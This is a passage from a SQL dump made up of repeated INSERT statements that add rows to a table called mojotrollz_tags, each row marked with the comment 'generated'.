`type`, `value`, `comment`) VALUES (96, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (97, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (98, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (99, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (100, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (101, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (102, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (103, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (104, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (105, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (106, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (107, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (108, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (109, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (110, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (111, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (112, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (113, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (114, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (115, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (116, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (117, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (118, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (119, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (121, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (122, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (123, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (124, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (256, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (257, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (259, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (261, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (263, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (264, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (269, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (270, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (271, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (272, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (276, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (287, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (288, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (290, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (298, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (299, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (301, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (302, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (303, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (304, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (305, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (306, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (307, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (308, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (309, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (310, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (311, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (312, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (313, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (314, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (315, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (316, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (317, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (318, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (321, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (324, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (331, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (333, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (334, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (372, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (375, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (376, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (377, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (378, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (379, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (380, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (381, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (382, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (386, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (387, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (388, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (389, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (711, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (759, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1162, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1165, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1166, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1557, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1560, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1561, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1562, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1564, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1565, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1566, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1567, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1568, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1569, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1570, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1571, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1572, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1573, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1585, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1586, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1587, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1593, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1594, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1595, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1596, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1597, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1598, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1599, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1609, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1610, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1617, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1618, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1619, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1620, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1621, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1622, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1623, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1624, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1627, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1628, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1630, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1631, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1632, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1633, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1634, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1638, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1639, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1643, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1644, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1645, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1646, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1647, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1648, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1649, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1650, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1651, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1652, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1653, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1654, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1655, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1656, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1657, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1658, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1659, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1660, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1661, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1662, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1663, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1664, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1665, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1666, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1667, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1668, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1669, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1673, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1674, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1675, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1676, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1677, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1678, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1679, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1680, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1681, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1685, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1686, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1687, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1688, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1689, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1690, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1691, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1692, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1693, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1694, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1695, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1696, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1697, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1698, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1699, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1700, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1701, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1702, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1703, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1704, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1705, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1706, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1707, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1708, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1709, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1710, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1711, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1712, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1713, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1714, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1715, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1720, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1721, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1722, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1723, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1726, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1727, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1728, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1729, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1730, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1731, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1732, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1733, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1734, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1735, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1736, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1740, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1743, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1744, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1745, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1748, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1749, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1759, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1760, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1761, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1763, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1764, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1765, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1766, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1767, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1768, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1769, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1770, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1771, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1772, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1773, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1774, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1775, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1776, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1777, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1778, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1779, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1780, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1781, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1782, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1783, 2, 